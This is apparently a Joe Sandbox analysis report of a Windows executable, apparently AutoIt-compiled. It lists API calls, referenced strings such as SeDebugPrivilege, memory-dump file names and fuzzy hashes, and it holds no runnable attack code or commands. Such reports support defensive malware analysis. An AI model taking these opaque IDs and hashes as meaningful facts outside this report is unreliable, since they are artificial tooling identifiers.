                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F2B3F4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                                                                                      • Opcode ID: c773964776e0b89ecda4e8609d519c2549155bc9dbd782b6870c6bdecfc6ba59
                                                                                                                                                                                                                                                      • Instruction ID: f6f5761b0534699fd37e382a5e8ca84982ba027f97ea0fececad170e50467212
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c773964776e0b89ecda4e8609d519c2549155bc9dbd782b6870c6bdecfc6ba59
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B519631A04228BBEF20DF18EC85BAD3BA4EB05324F644115FE15E61E2D775ED40BB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F3DB1B
                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F3DB3C
                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F3DB51
                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F3DB6E
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F3DB95
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00EDA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00F3DBA0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F3DBBD
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00EDA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00F3DBC8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1268354404-0
                                                                                                                                                                                                                                                      • Opcode ID: c045659281e56941100d74f9edc4518f80b99d3ee3157f48bb54c18910bcde18
                                                                                                                                                                                                                                                      • Instruction ID: bcf21f37d9e966ae5bfa29589af050d683747f0439f785676ca993ee72b98b37
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c045659281e56941100d74f9edc4518f80b99d3ee3157f48bb54c18910bcde18
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4516A30A00208EFDB24DF64DC81FAA77B9FB58364F14052AF956A62D0D7B0ED91EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F05FA6,?), ref: 00F06ED8
                                                                                                                                                                                                                                                        • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F05FA6,?), ref: 00F06EF1
                                                                                                                                                                                                                                                        • Part of subcall function 00F072CB: GetFileAttributesW.KERNEL32(?,00F06019), ref: 00F072CC
                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00F075CA
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F075E2
                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00F075FB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 793581249-0
                                                                                                                                                                                                                                                      • Opcode ID: b9e5212a14260273443cae34fc96686af540cab6d46721849a32f2ae5064fdc9
                                                                                                                                                                                                                                                      • Instruction ID: ee7ebe702c839036f99a29493cfd9825ac3682c4cfdc197fe401ad7e5b7ac6fb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9e5212a14260273443cae34fc96686af540cab6d46721849a32f2ae5064fdc9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F51F1B2D0921D9ADF64EB94DC419DE73BC9F08320B5040DAFA05E3181DB75A6C5EF64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F3DAD1,00000004,00000000,00000000), ref: 00EDEAEB
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00F3DAD1,00000004,00000000,00000000), ref: 00EDEB32
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00F3DAD1,00000004,00000000,00000000), ref: 00F3DC86
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F3DAD1,00000004,00000000,00000000), ref: 00F3DCF2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                                                                      • Opcode ID: e5ed94d9ee11b2f67257aa79b1d664837975ffd7690dc3127f707da91e927d97
                                                                                                                                                                                                                                                      • Instruction ID: 5e430b100e7c845bd43c02dbd875f1ecbaaaebada01cbe1310fc9a3bfeaa2c2f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5ed94d9ee11b2f67257aa79b1d664837975ffd7690dc3127f707da91e927d97
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65412A70714680DAD73567289D8DB7A7A95FB53328F19340FF087AE761D670B842E311
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB26C
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB273
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EFAEF1,00000B00,?,?), ref: 00EFB288
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB290
                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB293
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EFAEF1,00000B00,?,?), ref: 00EFB2A3
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00EFAEF1,00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB2AB
                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00EFAEF1,00000B00,?,?), ref: 00EFB2AE
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00EFB2D4,00000000,00000000,00000000), ref: 00EFB2C8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                                                                                                      • Opcode ID: 4d14197ad7c1178aef6da10cb4fd3147d1f98ea69f2767beb3e8dda73a483df3
                                                                                                                                                                                                                                                      • Instruction ID: e8f12226d04413496febb2c464c56e089c8466e6f4b8a34b3ec1d3c38eac9959
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d14197ad7c1178aef6da10cb4fd3147d1f98ea69f2767beb3e8dda73a483df3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8601C9B9240308BFE710AFA5DC4DF6B7BACEB99B11F018411FE05DB2A1CA749810DB61
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                                                                                                      • Opcode ID: 29f4ec2dd5c99683cc0bdfbf9a8d603dbb07a55424a3156d066a2136148f70d7
                                                                                                                                                                                                                                                      • Instruction ID: c5a70fe39b9405f4fb0fdf0b335c75e4ee5e74c8569d3b3ee9a8389eab80cf4f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29f4ec2dd5c99683cc0bdfbf9a8d603dbb07a55424a3156d066a2136148f70d7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDE1A271E40219ABDF14DFA4D881BEE77B5EF48364F148029E905AB281D770ED81EBD0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                                                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                      • API String ID: 2862541840-625585964
                                                                                                                                                                                                                                                      • Opcode ID: b674143e89329aedca6ae89ea7db4c693f7286292ddf34d4655cbe3a62975137
                                                                                                                                                                                                                                                      • Instruction ID: f4069d2eb3058cdd4d5b87dba6974bcd66000590075a68feed68bde5a93672cf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b674143e89329aedca6ae89ea7db4c693f7286292ddf34d4655cbe3a62975137
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56918F71E00219EBDF24DFA5D844FEEBBB8EF85720F10815AF505AB291D7709981DBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F29B19
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F29B2D
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F29B47
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F29BA2
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F29BB9
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F29BE7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                                                                                                                                                      • Opcode ID: 2cf6377692894f73a0fd1a8990b82d720a6b3a132583e8e08ed86b279c513015
                                                                                                                                                                                                                                                      • Instruction ID: f46aac7e9680b069cc65f9f8db0578305218ea0da31dc8b7730425453d185562
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cf6377692894f73a0fd1a8990b82d720a6b3a132583e8e08ed86b279c513015
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C841D371A04318ABDB219FA4DC85BEE77E8EF08350F10442AF589E7291D7B59D84EB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F06532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F06554
                                                                                                                                                                                                                                                        • Part of subcall function 00F06532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F06564
                                                                                                                                                                                                                                                        • Part of subcall function 00F06532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F065F9
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F2179A
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00F217AD
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F217D9
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F21855
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00F21860
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F21895
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                      • Opcode ID: fb7c3f245afcd3691dc16321a9e22544dd562e61ea124fc3dbcd416083fea2ce
                                                                                                                                                                                                                                                      • Instruction ID: 144844541926ff2960b1c35f29e224af33abd56ccc0099dbea4ad5cc365ef866
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb7c3f245afcd3691dc16321a9e22544dd562e61ea124fc3dbcd416083fea2ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C41CE72600210AFDB15EF54DDE5FADB7A1BF64310F048059FA06AB2C2DB79A901AB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00F058B8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                      • Opcode ID: 298789f90147bc7db03c7483d2dc74b724e6eb035a40857092b684b708751543
                                                                                                                                                                                                                                                      • Instruction ID: 36e21d355ebfacbd5494f877697f22aa5421d1f3e6567727287c54d00d261dc0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 298789f90147bc7db03c7483d2dc74b724e6eb035a40857092b684b708751543
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC112E36B09746FAE7005A559C42D6B33DCDF15720B20403AFD00A52C1F7F09940BA65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00F0A806
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1725837607-0
                                                                                                                                                                                                                                                      • Opcode ID: 94b9dba1a99babe3bb18aae03fa1c1134be9a946574f786462aceb57db26cf14
                                                                                                                                                                                                                                                      • Instruction ID: fe0f6f6f59287bbbc55a48187f841980a2bc6c7daa9fe3916a341b1d1b845f1a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94b9dba1a99babe3bb18aae03fa1c1134be9a946574f786462aceb57db26cf14
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7C17D75A0531ADFDB00CF94C885BAEB7F4EF09311F20806AE605EB2D1D738A941EB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F06B63
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00F06B6A
                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F06B80
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00F06B87
                                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00F06BAD
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F06BCB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00F06BA8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
